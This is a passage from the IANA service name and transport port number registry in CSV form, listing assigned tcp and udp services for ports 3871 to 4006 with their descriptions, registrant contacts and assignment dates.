avocent-adsap,3871,udp,Avocent DS Authorization,[Eduardo_Fernandez],[Eduardo_Fernandez],2003-08,,,,, oem-agent,3872,tcp,OEM Agent,[Narain_Jagathesan],[Narain_Jagathesan],2003-11,,,,, oem-agent,3872,udp,OEM Agent,[Narain_Jagathesan],[Narain_Jagathesan],2003-11,,,,, fagordnc,3873,tcp,fagordnc,[Luis_Zugasti],[Luis_Zugasti],2003-11,,,,, fagordnc,3873,udp,fagordnc,[Luis_Zugasti],[Luis_Zugasti],2003-11,,,,, sixxsconfig,3874,tcp,SixXS Configuration,[Jeroen_Massar],[Jeroen_Massar],2003-11,,,,, sixxsconfig,3874,udp,SixXS Configuration,[Jeroen_Massar],[Jeroen_Massar],2003-11,,,,, pnbscada,3875,tcp,PNBSCADA,[Philip_N_Bergstress],[Philip_N_Bergstress],,,,,, pnbscada,3875,udp,PNBSCADA,[Philip_N_Bergstress],[Philip_N_Bergstress],,,,,, dl-agent,3876,tcp,"DirectoryLockdown Agent IANA assigned this well-formed service name as a replacement for ""dl_agent"".",[Jason_Lockett][Melanie_Kacerek],[Jason_Lockett][Melanie_Kacerek],2008-12-16,,,,, dl_agent,3876,tcp,DirectoryLockdown Agent,[Jason_Lockett][Melanie_Kacerek],[Jason_Lockett][Melanie_Kacerek],2008-12-16,,,,,"This entry is an alias to ""dl-agent"". This entry is now historic, not usable for use with many common service discovery mechanisms." dl-agent,3876,udp,"DirectoryLockdown Agent IANA assigned this well-formed service name as a replacement for ""dl_agent"".",[Jason_Lockett][Melanie_Kacerek],[Jason_Lockett][Melanie_Kacerek],2008-12-16,,,,, dl_agent,3876,udp,DirectoryLockdown Agent,[Jason_Lockett][Melanie_Kacerek],[Jason_Lockett][Melanie_Kacerek],2008-12-16,,,,,"This entry is an alias to ""dl-agent"". This entry is now historic, not usable for use with many common service discovery mechanisms." xmpcr-interface,3877,tcp,XMPCR Interface Port,[Christopher_Carlson],[Christopher_Carlson],2003-10,,,,, xmpcr-interface,3877,udp,XMPCR Interface Port,[Christopher_Carlson],[Christopher_Carlson],2003-10,,,,, fotogcad,3878,tcp,FotoG CAD interface,[Jason_Szabo],[Jason_Szabo],2003-10,,,,, fotogcad,3878,udp,FotoG CAD interface,[Jason_Szabo],[Jason_Szabo],2003-10,,,,, appss-lm,3879,tcp,appss license manager,[Peter_Krueger],[Peter_Krueger],2003-10,,,,, appss-lm,3879,udp,appss license manager,[Peter_Krueger],[Peter_Krueger],2003-10,,,,, igrs,3880,tcp,IGRS,[Huang_Jingnan],[Huang_Jingnan],2003-10,,,,, igrs,3880,udp,IGRS,[Huang_Jingnan],[Huang_Jingnan],2003-10,,,,, idac,3881,tcp,Data Acquisition and Control,[Chatziandreoglou_Chr],[Chatziandreoglou_Chr],2003-10,,,,, idac,3881,udp,Data Acquisition and Control,[Chatziandreoglou_Chr],[Chatziandreoglou_Chr],2003-10,,,,, msdts1,3882,tcp,DTS Service Port,[Sergei_Ivanov],[Sergei_Ivanov],2003-10,,,,, msdts1,3882,udp,DTS Service Port,[Sergei_Ivanov],[Sergei_Ivanov],2003-10,,,,, vrpn,3883,tcp,VR Peripheral Network,[Russell_M_Taylor_II],[Russell_M_Taylor_II],2003-10,,,,, vrpn,3883,udp,VR Peripheral Network,[Russell_M_Taylor_II],[Russell_M_Taylor_II],2003-10,,,,, softrack-meter,3884,tcp,SofTrack Metering,[John_T_McCann],[John_T_McCann],2003-10,,,,, softrack-meter,3884,udp,SofTrack Metering,[John_T_McCann],[John_T_McCann],2003-10,,,,, topflow-ssl,3885,tcp,TopFlow SSL,[Ken_Nelson],[Ken_Nelson],,,,,, topflow-ssl,3885,udp,TopFlow SSL,[Ken_Nelson],[Ken_Nelson],,,,,, nei-management,3886,tcp,NEI management port,[Kevin_Murphy_2],[Kevin_Murphy_2],2003-10,,,,, nei-management,3886,udp,NEI management port,[Kevin_Murphy_2],[Kevin_Murphy_2],2003-10,,,,, ciphire-data,3887,tcp,Ciphire Data Transport,[Lars_Eilebrecht],[Lars_Eilebrecht],2003-10,,,,, ciphire-data,3887,udp,Ciphire Data Transport,[Lars_Eilebrecht],[Lars_Eilebrecht],2003-10,,,,, ciphire-serv,3888,tcp,Ciphire Services,[Lars_Eilebrecht],[Lars_Eilebrecht],2003-10,,,,, ciphire-serv,3888,udp,Ciphire Services,[Lars_Eilebrecht],[Lars_Eilebrecht],2003-10,,,,, dandv-tester,3889,tcp,D and V Tester Control Port,[Voiko_Loukanov],[Voiko_Loukanov],2003-10,,,,, dandv-tester,3889,udp,D and V Tester Control Port,[Voiko_Loukanov],[Voiko_Loukanov],2003-10,,,,, ndsconnect,3890,tcp,Niche Data Server Connect,[Roland_Schneider],[Roland_Schneider],2003-10,,,,, ndsconnect,3890,udp,Niche Data Server Connect,[Roland_Schneider],[Roland_Schneider],2003-10,,,,, rtc-pm-port,3891,tcp,Oracle RTC-PM port,[PV_Shivkumar],[PV_Shivkumar],2003-10,,,,, rtc-pm-port,3891,udp,Oracle RTC-PM port,[PV_Shivkumar],[PV_Shivkumar],2003-10,,,,, pcc-image-port,3892,tcp,PCC-image-port,[Shiro_Tamoto],[Shiro_Tamoto],2003-10,,,,, pcc-image-port,3892,udp,PCC-image-port,[Shiro_Tamoto],[Shiro_Tamoto],2003-10,,,,, cgi-starapi,3893,tcp,CGI StarAPI Server,[Garry_Moore],[Garry_Moore],2003-10,,,,, cgi-starapi,3893,udp,CGI StarAPI Server,[Garry_Moore],[Garry_Moore],2003-10,,,,, syam-agent,3894,tcp,SyAM Agent Port,[Michael_Daniele],[Michael_Daniele],2003-10,,,,, syam-agent,3894,udp,SyAM Agent Port,[Michael_Daniele],[Michael_Daniele],2003-10,,,,, syam-smc,3895,tcp,SyAm SMC Service Port,[Michael_Daniele],[Michael_Daniele],2003-10,,,,, syam-smc,3895,udp,SyAm SMC Service Port,[Michael_Daniele],[Michael_Daniele],2003-10,,,,, sdo-tls,3896,tcp,Simple Distributed Objects over TLS,[Alexander_Philippou],[Alexander_Philippou],2003-10,,,,, sdo-tls,3896,udp,Simple Distributed Objects over TLS,[Alexander_Philippou],[Alexander_Philippou],2003-10,,,,, sdo-ssh,3897,tcp,Simple Distributed Objects over SSH,[Alexander_Philippou],[Alexander_Philippou],2003-10,,,,, sdo-ssh,3897,udp,Simple Distributed Objects over SSH,[Alexander_Philippou],[Alexander_Philippou],2003-10,,,,, senip,3898,tcp,"IAS, Inc. SmartEye NET Internet Protocol",[Matt_Nowicki],[Matt_Nowicki],2003-10,,,,, senip,3898,udp,"IAS, Inc. SmartEye NET Internet Protocol",[Matt_Nowicki],[Matt_Nowicki],2003-10,,,,, itv-control,3899,tcp,ITV Port,[Alex_Nicu],[Alex_Nicu],2003-10,,,,, itv-control,3899,udp,ITV Port,[Alex_Nicu],[Alex_Nicu],2003-10,,,,, udt-os,3900,tcp,"Unidata UDT OS IANA assigned this well-formed service name as a replacement for ""udt_os"".",[James_Powell],[James_Powell],,,,,, udt_os,3900,tcp,Unidata UDT OS,[James_Powell],[James_Powell],,,,,,"This entry is an alias to ""udt-os"". This entry is now historic, not usable for use with many common service discovery mechanisms." udt-os,3900,udp,"Unidata UDT OS IANA assigned this well-formed service name as a replacement for ""udt_os"".",[James_Powell],[James_Powell],,,,,, udt_os,3900,udp,Unidata UDT OS,[James_Powell],[James_Powell],,,,,,"This entry is an alias to ""udt-os"". This entry is now historic, not usable for use with many common service discovery mechanisms." nimsh,3901,tcp,NIM Service Handler,[Paul_B_Finley],[Paul_B_Finley],2003-10,,,,, nimsh,3901,udp,NIM Service Handler,[Paul_B_Finley],[Paul_B_Finley],2003-10,,,,, nimaux,3902,tcp,NIMsh Auxiliary Port,[Paul_B_Finley],[Paul_B_Finley],2003-10,,,,, nimaux,3902,udp,NIMsh Auxiliary Port,[Paul_B_Finley],[Paul_B_Finley],2003-10,,,,, charsetmgr,3903,tcp,CharsetMGR,[Tatsuya_Ueda],[Tatsuya_Ueda],2003-10,,,,, charsetmgr,3903,udp,CharsetMGR,[Tatsuya_Ueda],[Tatsuya_Ueda],2003-10,,,,, omnilink-port,3904,tcp,Arnet Omnilink Port,[Ronen_Shaul],[Ronen_Shaul],2003-10,,,,, omnilink-port,3904,udp,Arnet Omnilink Port,[Ronen_Shaul],[Ronen_Shaul],2003-10,,,,, mupdate,3905,tcp,Mailbox Update (MUPDATE) protocol,,,,,[RFC3656],,, mupdate,3905,udp,Mailbox Update (MUPDATE) protocol,,,,,[RFC3656],,, topovista-data,3906,tcp,TopoVista elevation data,[Gregg_Townsend],[Gregg_Townsend],2003-11,,,,, topovista-data,3906,udp,TopoVista elevation data,[Gregg_Townsend],[Gregg_Townsend],2003-11,,,,, imoguia-port,3907,tcp,Imoguia Port,[Emidio_Cunha],[Emidio_Cunha],2003-11,,,,, imoguia-port,3907,udp,Imoguia Port,[Emidio_Cunha],[Emidio_Cunha],2003-11,,,,, hppronetman,3908,tcp,HP Procurve NetManagement,[Devon_Dawson],[Devon_Dawson],2003-11,,,,, hppronetman,3908,udp,HP Procurve NetManagement,[Devon_Dawson],[Devon_Dawson],2003-11,,,,, surfcontrolcpa,3909,tcp,SurfControl CPA,[Hywel_Morgan],[Hywel_Morgan],2003-11,,,,, surfcontrolcpa,3909,udp,SurfControl CPA,[Hywel_Morgan],[Hywel_Morgan],2003-11,,,,, prnrequest,3910,tcp,Printer Request Port,[Brett_Green],[Brett_Green],2003-11,,,,, prnrequest,3910,udp,Printer Request Port,[Brett_Green],[Brett_Green],2003-11,,,,, prnstatus,3911,tcp,Printer Status Port,[Brett_Green],[Brett_Green],2003-11,,,,, prnstatus,3911,udp,Printer Status Port,[Brett_Green],[Brett_Green],2003-11,,,,, gbmt-stars,3912,tcp,Global Maintech Stars,[Harry_Goldschmitt],[Harry_Goldschmitt],2003-11,,,,, gbmt-stars,3912,udp,Global Maintech Stars,[Harry_Goldschmitt],[Harry_Goldschmitt],2003-11,,,,, listcrt-port,3913,tcp,ListCREATOR Port,[Tomokazu_Asai],[Tomokazu_Asai],2003-11,,,,, listcrt-port,3913,udp,ListCREATOR Port,[Tomokazu_Asai],[Tomokazu_Asai],2003-11,,,,, listcrt-port-2,3914,tcp,ListCREATOR Port 2,[Tomokazu_Asai],[Tomokazu_Asai],2003-11,,,,, listcrt-port-2,3914,udp,ListCREATOR Port 2,[Tomokazu_Asai],[Tomokazu_Asai],2003-11,,,,, agcat,3915,tcp,Auto-Graphics Cataloging,[Paul_Cope],[Paul_Cope],2003-11,,,,, agcat,3915,udp,Auto-Graphics Cataloging,[Paul_Cope],[Paul_Cope],2003-11,,,,, wysdmc,3916,tcp,WysDM Controller,[Jim_McDonald_2],[Jim_McDonald_2],2003-11,,,,, wysdmc,3916,udp,WysDM Controller,[Jim_McDonald_2],[Jim_McDonald_2],2003-11,,,,, aftmux,3917,tcp,AFT multiplex port,[Alfred_Schmidt],[Alfred_Schmidt],2003-11,,,,, aftmux,3917,udp,AFT multiples port,[Alfred_Schmidt],[Alfred_Schmidt],2003-11,,,,, pktcablemmcops,3918,tcp,PacketCableMultimediaCOPS,[Eric_Rosenfeld],[Eric_Rosenfeld],2003-11,,,,, pktcablemmcops,3918,udp,PacketCableMultimediaCOPS,[Eric_Rosenfeld],[Eric_Rosenfeld],2003-11,,,,, hyperip,3919,tcp,HyperIP,[Dave_Reiland],[Dave_Reiland],2003-11,,,,, hyperip,3919,udp,HyperIP,[Dave_Reiland],[Dave_Reiland],2003-11,,,,, exasoftport1,3920,tcp,Exasoft IP Port,[Alan_Malik],[Alan_Malik],2003-11,,,,, exasoftport1,3920,udp,Exasoft IP Port,[Alan_Malik],[Alan_Malik],2003-11,,,,, herodotus-net,3921,tcp,Herodotus Net,[Adam_Gawne_Cain],[Adam_Gawne_Cain],2003-11,,,,, herodotus-net,3921,udp,Herodotus Net,[Adam_Gawne_Cain],[Adam_Gawne_Cain],2003-11,,,,, sor-update,3922,tcp,Soronti Update Port,[Carleton_Watkins],[Carleton_Watkins],2003-11,,,,, sor-update,3922,udp,Soronti Update Port,[Carleton_Watkins],[Carleton_Watkins],2003-11,,,,, symb-sb-port,3923,tcp,Symbian Service Broker,[Ian_McDowall],[Ian_McDowall],2003-11,,,,, symb-sb-port,3923,udp,Symbian Service Broker,[Ian_McDowall],[Ian_McDowall],2003-11,,,,, mpl-gprs-port,3924,tcp,MPL_GPRS_PORT,[David_Barrass_2],[David_Barrass_2],2003-11,,,,, mpl-gprs-port,3924,udp,MPL_GPRS_Port,[David_Barrass_2],[David_Barrass_2],2003-11,,,,, zmp,3925,tcp,Zoran Media Port,[Gerard_Cerchio],[Gerard_Cerchio],2003-11,,,,, zmp,3925,udp,Zoran Media Port,[Gerard_Cerchio],[Gerard_Cerchio],2003-11,,,,, winport,3926,tcp,WINPort,[Alwin_Egger],[Alwin_Egger],2003-11,,,,, winport,3926,udp,WINPort,[Alwin_Egger],[Alwin_Egger],2003-11,,,,, natdataservice,3927,tcp,ScsTsr,[Ghanshyam_Patel],[Ghanshyam_Patel],2003-11,,,,, natdataservice,3927,udp,ScsTsr,[Ghanshyam_Patel],[Ghanshyam_Patel],2003-11,,,,, netboot-pxe,3928,tcp,PXE NetBoot Manager,[Markus_Treinen],[Markus_Treinen],2003-11,,,,, netboot-pxe,3928,udp,PXE NetBoot Manager,[Markus_Treinen],[Markus_Treinen],2003-11,,,,, smauth-port,3929,tcp,AMS Port,[Angelique_Dokos],[Angelique_Dokos],2003-11,,,,, smauth-port,3929,udp,AMS Port,[Angelique_Dokos],[Angelique_Dokos],2003-11,,,,, syam-webserver,3930,tcp,Syam Web Server Port,[Michael_Daniele],[Michael_Daniele],2003-11,,,,, syam-webserver,3930,udp,Syam Web Server Port,[Michael_Daniele],[Michael_Daniele],2003-11,,,,, msr-plugin-port,3931,tcp,MSR Plugin Port,[Ron_Steed],[Ron_Steed],2003-11,,,,, msr-plugin-port,3931,udp,MSR Plugin Port,[Ron_Steed],[Ron_Steed],2003-11,,,,, dyn-site,3932,tcp,Dynamic Site System,[Steve_Qi],[Steve_Qi],2003-11,,,,, dyn-site,3932,udp,Dynamic Site System,[Steve_Qi],[Steve_Qi],2003-11,,,,, plbserve-port,3933,tcp,PL/B App Server User Port,[Edward_R_Boedecker],[Edward_R_Boedecker],2003-11,,,,, plbserve-port,3933,udp,PL/B App Server User Port,[Edward_R_Boedecker],[Edward_R_Boedecker],2003-11,,,,, sunfm-port,3934,tcp,PL/B File Manager Port,[Edward_R_Boedecker],[Edward_R_Boedecker],2003-11,,,,, sunfm-port,3934,udp,PL/B File Manager Port,[Edward_R_Boedecker],[Edward_R_Boedecker],2003-11,,,,, sdp-portmapper,3935,tcp,SDP Port Mapper Protocol,[James_Pinkerton],[James_Pinkerton],2003-11,,,,, sdp-portmapper,3935,udp,SDP Port Mapper Protocol,[James_Pinkerton],[James_Pinkerton],2003-11,,,,, mailprox,3936,tcp,Mailprox,[Christof_Drescher],[Christof_Drescher],2003-11,,,,, mailprox,3936,udp,Mailprox,[Christof_Drescher],[Christof_Drescher],2003-11,,,,, dvbservdsc,3937,tcp,DVB Service Discovery,[Bert_van_Willigen][Peter_MacAvock],[Bert_van_Willigen][Peter_MacAvock],2003-11,,,,, dvbservdsc,3937,udp,DVB Service Discovery,[Bert_van_Willigen][Peter_MacAvock],[Bert_van_Willigen][Peter_MacAvock],2003-11,,,,, dbcontrol-agent,3938,tcp,"Oracle dbControl Agent po IANA assigned this well-formed service name as a replacement for ""dbcontrol_agent"".",[Todd_Guay],[Todd_Guay],2003-11,,,,, dbcontrol_agent,3938,tcp,Oracle dbControl Agent po,[Todd_Guay],[Todd_Guay],2003-11,,,,,"This entry is an alias to ""dbcontrol-agent"". This entry is now historic, not usable for use with many common service discovery mechanisms." dbcontrol-agent,3938,udp,"Oracel dbControl Agent po IANA assigned this well-formed service name as a replacement for ""dbcontrol_agent"".",[Todd_Guay],[Todd_Guay],2003-11,,,,, dbcontrol_agent,3938,udp,Oracel dbControl Agent po,[Todd_Guay],[Todd_Guay],2003-11,,,,,"This entry is an alias to ""dbcontrol-agent"". This entry is now historic, not usable for use with many common service discovery mechanisms." aamp,3939,tcp,Anti-virus Application Management Port,[In_sik_Choi],[In_sik_Choi],2002-02,,,,, aamp,3939,udp,Anti-virus Application Management Port,[In_sik_Choi],[In_sik_Choi],2002-02,,,,, xecp-node,3940,tcp,XeCP Node Service,[Brent_McCullough],[Brent_McCullough],2003-11,,,,, xecp-node,3940,udp,XeCP Node Service,[Brent_McCullough],[Brent_McCullough],2003-11,,,,, homeportal-web,3941,tcp,Home Portal Web Server,[Christian_Beaumont],[Christian_Beaumont],2003-11,,,,, homeportal-web,3941,udp,Home Portal Web Server,[Christian_Beaumont],[Christian_Beaumont],2003-11,,,,, srdp,3942,tcp,satellite distribution,[Simone_Molendini],[Simone_Molendini],2003-11,,,,, srdp,3942,udp,satellite distribution,[Simone_Molendini],[Simone_Molendini],2003-11,,,,, tig,3943,tcp,TetraNode Ip Gateway,[B_van_Klinken],[B_van_Klinken],2003-12,,,,, tig,3943,udp,TetraNode Ip Gateway,[B_van_Klinken],[B_van_Klinken],2003-12,,,,, sops,3944,tcp,S-Ops Management,[Stefan_Hochuli],[Stefan_Hochuli],2003-12,,,,, sops,3944,udp,S-Ops Management,[Stefan_Hochuli],[Stefan_Hochuli],2003-12,,,,, emcads,3945,tcp,EMCADS Server Port,[Lars_Struwe_Christen],[Lars_Struwe_Christen],2004-01,,,,, emcads,3945,udp,EMCADS Server Port,[Lars_Struwe_Christen],[Lars_Struwe_Christen],2004-01,,,,, backupedge,3946,tcp,BackupEDGE Server,[Frank_Liberato],[Frank_Liberato],2004-06,,,,, backupedge,3946,udp,BackupEDGE Server,[Frank_Liberato],[Frank_Liberato],2004-06,,,,, ccp,3947,tcp,"Connect and Control Protocol for Consumer, Commercial, and Industrial Electronic Devices",[Aaron_Myer],[Aaron_Myer],2004-06,,,,, ccp,3947,udp,"Connect and Control Protocol for Consumer, Commercial, and Industrial Electronic Devices",[Aaron_Myer],[Aaron_Myer],2004-06,,,,, apdap,3948,tcp,Anton Paar Device Administration Protocol,[Martin_Leitner],[Martin_Leitner],2004-06,,,,, apdap,3948,udp,Anton Paar Device Administration Protocol,[Martin_Leitner],[Martin_Leitner],2004-06,,,,, drip,3949,tcp,Dynamic Routing Information Protocol,[Dana_Blair],[Dana_Blair],2004-06,,,,, drip,3949,udp,Dynamic Routing Information Protocol,[Dana_Blair],[Dana_Blair],2004-06,,,,, namemunge,3950,tcp,Name Munging,[John_C_Klensin],[John_C_Klensin],2004-07,,,,, namemunge,3950,udp,Name Munging,[John_C_Klensin],[John_C_Klensin],2004-07,,,,, pwgippfax,3951,tcp,PWG IPP Facsimile,[Ira_McDonald],[Ira_McDonald],2004-08,,,,, pwgippfax,3951,udp,PWG IPP Facsimile,[Ira_McDonald],[Ira_McDonald],2004-08,,,,, i3-sessionmgr,3952,tcp,I3 Session Manager,[Mike_Gagle_2],[Mike_Gagle_2],2004-08,,,,, i3-sessionmgr,3952,udp,I3 Session Manager,[Mike_Gagle_2],[Mike_Gagle_2],2004-08,,,,, xmlink-connect,3953,tcp,Eydeas XMLink Connect,[David_Crewson],[David_Crewson],2004-09,,,,, xmlink-connect,3953,udp,Eydeas XMLink Connect,[David_Crewson],[David_Crewson],2004-09,,,,, adrep,3954,tcp,AD Replication RPC,[Robert_Ball],[Robert_Ball],2008-03-26,,,,, adrep,3954,udp,AD Replication RPC,[Robert_Ball],[Robert_Ball],2008-03-26,,,,, p2pcommunity,3955,tcp,p2pCommunity,[Tiago_Bittencourt_Si],[Tiago_Bittencourt_Si],2005-08,,,,, p2pcommunity,3955,udp,p2pCommunity,[Tiago_Bittencourt_Si],[Tiago_Bittencourt_Si],2005-08,,,,, gvcp,3956,tcp,GigE Vision Control,[Eric_Carey],[Eric_Carey],2005-08,,,,, gvcp,3956,udp,GigE Vision Control,[Eric_Carey],[Eric_Carey],2005-08,,,,, mqe-broker,3957,tcp,MQEnterprise Broker,,,,,,,, mqe-broker,3957,udp,MQEnterprise Broker,,,,,,,, mqe-agent,3958,tcp,MQEnterprise Agent,[Bob_Lauria],[Bob_Lauria],2005-08,,,,, mqe-agent,3958,udp,MQEnterprise Agent,[Bob_Lauria],[Bob_Lauria],2005-08,,,,, treehopper,3959,tcp,Tree Hopper Networking,[Gary_Whelan],[Gary_Whelan],2005-08,,,,, treehopper,3959,udp,Tree Hopper Networking,[Gary_Whelan],[Gary_Whelan],2005-08,,,,, bess,3960,tcp,Bess Peer Assessment,[Peter_Verdon],[Peter_Verdon],2005-08,,,,, bess,3960,udp,Bess Peer Assessment,[Peter_Verdon],[Peter_Verdon],2005-08,,,,, proaxess,3961,tcp,ProAxess Server,[Jonas_Ahlqvist],[Jonas_Ahlqvist],2005-08,,,,, proaxess,3961,udp,ProAxess Server,[Jonas_Ahlqvist],[Jonas_Ahlqvist],2005-08,,,,, sbi-agent,3962,tcp,SBI Agent Protocol,[Yossi_Appleboum_2],[Yossi_Appleboum_2],2005-08,,,,, sbi-agent,3962,udp,SBI Agent Protocol,[Yossi_Appleboum_2],[Yossi_Appleboum_2],2005-08,,,,, thrp,3963,tcp,Teran Hybrid Routing Protocol,[Spencer_Teran],[Spencer_Teran],2005-08,,,,, thrp,3963,udp,Teran Hybrid Routing Protocol,[Spencer_Teran],[Spencer_Teran],2005-08,,,,, sasggprs,3964,tcp,SASG GPRS,[Cristian_Petculescu_3],[Cristian_Petculescu_3],2005-08,,,,, sasggprs,3964,udp,SASG GPRS,[Cristian_Petculescu_3],[Cristian_Petculescu_3],2005-08,,,,, ati-ip-to-ncpe,3965,tcp,Avanti IP to NCPE API,[Steve_Meyer_Sr],[Steve_Meyer_Sr],2005-08,,,,, ati-ip-to-ncpe,3965,udp,Avanti IP to NCPE API,[Steve_Meyer_Sr],[Steve_Meyer_Sr],2005-08,,,,, bflckmgr,3966,tcp,BuildForge Lock Manager,[Joe_Senner],[Joe_Senner],2005-08,,,,, bflckmgr,3966,udp,BuildForge Lock Manager,[Joe_Senner],[Joe_Senner],2005-08,,,,, ppsms,3967,tcp,PPS Message Service,[Bart_Schaefer],[Bart_Schaefer],2005-08,,,,, ppsms,3967,udp,PPS Message Service,[Bart_Schaefer],[Bart_Schaefer],2005-08,,,,, ianywhere-dbns,3968,tcp,iAnywhere DBNS,[Graeme_Perrow],[Graeme_Perrow],2005-08,,,,, ianywhere-dbns,3968,udp,iAnywhere DBNS,[Graeme_Perrow],[Graeme_Perrow],2005-08,,,,, landmarks,3969,tcp,Landmark Messages,[Petri_Rauhala],[Petri_Rauhala],2005-08,,,,, landmarks,3969,udp,Landmark Messages,[Petri_Rauhala],[Petri_Rauhala],2005-08,,,,, lanrevagent,3970,tcp,LANrev Agent,[Martin_Bestmann_3],[Martin_Bestmann_3],,,,,,"Defined TXT keys: txtvers server=
vers= build= id=" lanrevagent,3970,udp,LANrev Agent,[Martin_Bestmann_3],[Martin_Bestmann_3],,,,,,"Defined TXT keys: txtvers server=
vers= build= id=" lanrevserver,3971,tcp,LANrev Server,[Martin_Bestmann_3],[Martin_Bestmann_3],2005-08,,,,, lanrevserver,3971,udp,LANrev Server,[Martin_Bestmann_3],[Martin_Bestmann_3],2005-08,,,,, iconp,3972,tcp,ict-control Protocol,[Roel_Harbers],[Roel_Harbers],2005-08,,,,, iconp,3972,udp,ict-control Protocol,[Roel_Harbers],[Roel_Harbers],2005-08,,,,, progistics,3973,tcp,ConnectShip Progistics,[Jeff_Skaistis],[Jeff_Skaistis],2005-08,,,,, progistics,3973,udp,ConnectShip Progistics,[Jeff_Skaistis],[Jeff_Skaistis],2005-08,,,,, citysearch,3974,tcp,Remote Applicant Tracking Service,[Marc_Castelluccio],[Marc_Castelluccio],2005-08,,,,, citysearch,3974,udp,Remote Applicant Tracking Service,[Marc_Castelluccio],[Marc_Castelluccio],2005-08,,,,, airshot,3975,tcp,Air Shot,[Shingo_Kimura],[Shingo_Kimura],2005-08,,,,, airshot,3975,udp,Air Shot,[Shingo_Kimura],[Shingo_Kimura],2005-08,,,,, opswagent,3976,tcp,Opsware Agent,,,,,,,, opswagent,3976,udp,Opsware Agent,,,,,,,, opswmanager,3977,tcp,Opsware Manager,[Dave_Jagoda],[Dave_Jagoda],2006-06,,,,, opswmanager,3977,udp,Opsware Manager,[Dave_Jagoda],[Dave_Jagoda],2006-06,,,,, secure-cfg-svr,3978,tcp,Secured Configuration Server,[Dr_Anupam_Bharali],[Dr_Anupam_Bharali],2006-06,,,,, secure-cfg-svr,3978,udp,Secured Configuration Server,[Dr_Anupam_Bharali],[Dr_Anupam_Bharali],2006-06,,,,, smwan,3979,tcp,Smith Micro Wide Area Network Service,[David_Sperling],[David_Sperling],2006-06,,,,, smwan,3979,udp,Smith Micro Wide Area Network Service,[David_Sperling],[David_Sperling],2006-06,,,,, acms,3980,tcp,Aircraft Cabin Management System,[Dustin_Zack],[Dustin_Zack],2006-06,,,,, acms,3980,udp,Aircraft Cabin Management System,[Dustin_Zack],[Dustin_Zack],2006-06,,,,, starfish,3981,tcp,Starfish System Admin,[Dan_Razzell],[Dan_Razzell],2006-06,,,,, starfish,3981,udp,Starfish System Admin,[Dan_Razzell],[Dan_Razzell],2006-06,,,,, eis,3982,tcp,ESRI Image Server,,,,,,,, eis,3982,udp,ESRI Image Server,,,,,,,, eisp,3983,tcp,ESRI Image Service,[Keith_Ryden],[Keith_Ryden],2006-07,,,,, eisp,3983,udp,ESRI Image Service,[Keith_Ryden],[Keith_Ryden],2006-07,,,,, mapper-nodemgr,3984,tcp,MAPPER network node manager,,,,,,,, mapper-nodemgr,3984,udp,MAPPER network node manager,,,,,,,, mapper-mapethd,3985,tcp,MAPPER TCP/IP server,,,,,,,, mapper-mapethd,3985,udp,MAPPER TCP/IP server,,,,,,,, mapper-ws-ethd,3986,tcp,"MAPPER workstation server IANA assigned this well-formed service name as a replacement for ""mapper-ws_ethd"".",[John_C_Horton],[John_C_Horton],,,,,, mapper-ws_ethd,3986,tcp,MAPPER workstation server,[John_C_Horton],[John_C_Horton],,,,,,"This entry is an alias to ""mapper-ws-ethd"". This entry is now historic, not usable for use with many common service discovery mechanisms." mapper-ws-ethd,3986,udp,"MAPPER workstation server IANA assigned this well-formed service name as a replacement for ""mapper-ws_ethd"".",[John_C_Horton],[John_C_Horton],,,,,, mapper-ws_ethd,3986,udp,MAPPER workstation server,[John_C_Horton],[John_C_Horton],,,,,,"This entry is an alias to ""mapper-ws-ethd"". This entry is now historic, not usable for use with many common service discovery mechanisms." centerline,3987,tcp,Centerline,[Mark_Simpson],[Mark_Simpson],,,,,, centerline,3987,udp,Centerline,[Mark_Simpson],[Mark_Simpson],,,,,, dcs-config,3988,tcp,DCS Configuration Port,[Ian_Cargill],[Ian_Cargill],2005-08,,,,, dcs-config,3988,udp,DCS Configuration Port,[Ian_Cargill],[Ian_Cargill],2005-08,,,,, bv-queryengine,3989,tcp,BindView-Query Engine,,,,,,,, bv-queryengine,3989,udp,BindView-Query Engine,,,,,,,, bv-is,3990,tcp,BindView-IS,,,,,,,, bv-is,3990,udp,BindView-IS,,,,,,,, bv-smcsrv,3991,tcp,BindView-SMCServer,,,,,,,, bv-smcsrv,3991,udp,BindView-SMCServer,,,,,,,, bv-ds,3992,tcp,BindView-DirectoryServer,,,,,,,, bv-ds,3992,udp,BindView-DirectoryServer,,,,,,,, bv-agent,3993,tcp,BindView-Agent,[David_A_Gayler],[David_A_Gayler],2005-08,,,,, bv-agent,3993,udp,BindView-Agent,[David_A_Gayler],[David_A_Gayler],2005-08,,,,, ,3994,,Unassigned,,,,2008-04-24,,,, iss-mgmt-ssl,3995,tcp,ISS Management Svcs SSL,[Wes_Wilson],[Wes_Wilson],2003-10,,,,, iss-mgmt-ssl,3995,udp,ISS Management Svcs SSL,[Wes_Wilson],[Wes_Wilson],2003-10,,,,, abcsoftware,3996,tcp,abcsoftware-01,[Andrew_Zimmerman],[Andrew_Zimmerman],2004-06,,,,, abcsoftware,3996,udp,abcsoftware-01,[Andrew_Zimmerman],[Andrew_Zimmerman],2004-06,,,,, agentsease-db,3997,tcp,aes_db,[Colin_Hughes],[Colin_Hughes],2006-02,,,,, agentsease-db,3997,udp,aes_db,[Colin_Hughes],[Colin_Hughes],2006-02,,,,, dnx,3998,tcp,Distributed Nagios Executor Service,[John_Calcote],[John_Calcote],2007-11-06,,,,, dnx,3998,udp,Distributed Nagios Executor Service,[John_Calcote],[John_Calcote],2007-11-06,,,,, nvcnet,3999,tcp,Norman distributes scanning service,[Kristian_A_Bognaes],[Kristian_A_Bognaes],2007-11-06,,,,, nvcnet,3999,udp,Norman distributes scanning service,[Kristian_A_Bognaes],[Kristian_A_Bognaes],2007-11-06,,,,, terabase,4000,tcp,Terabase,[Thor_Olson],[Thor_Olson],,,,,,"Potential Conflict of ports PORT 4000 also used by ICQ " terabase,4000,udp,Terabase,[Thor_Olson],[Thor_Olson],,,,,,"Potential Conflict of ports PORT 4000 also used by ICQ " newoak,4001,tcp,NewOak,[Jim_Philippou],[Jim_Philippou],,,,,, newoak,4001,udp,NewOak,[Jim_Philippou],[Jim_Philippou],,,,,, pxc-spvr-ft,4002,tcp,pxc-spvr-ft,,,,,,,, pxc-spvr-ft,4002,udp,pxc-spvr-ft,,,,,,,, pxc-splr-ft,4003,tcp,pxc-splr-ft,,,,,,,, pxc-splr-ft,4003,udp,pxc-splr-ft,,,,,,,, pxc-roid,4004,tcp,pxc-roid,,,,,,,, pxc-roid,4004,udp,pxc-roid,,,,,,,, pxc-pin,4005,tcp,pxc-pin,,,,,,,, pxc-pin,4005,udp,pxc-pin,,,,,,,, pxc-spvr,4006,tcp,pxc-spvr,,,,,,,, 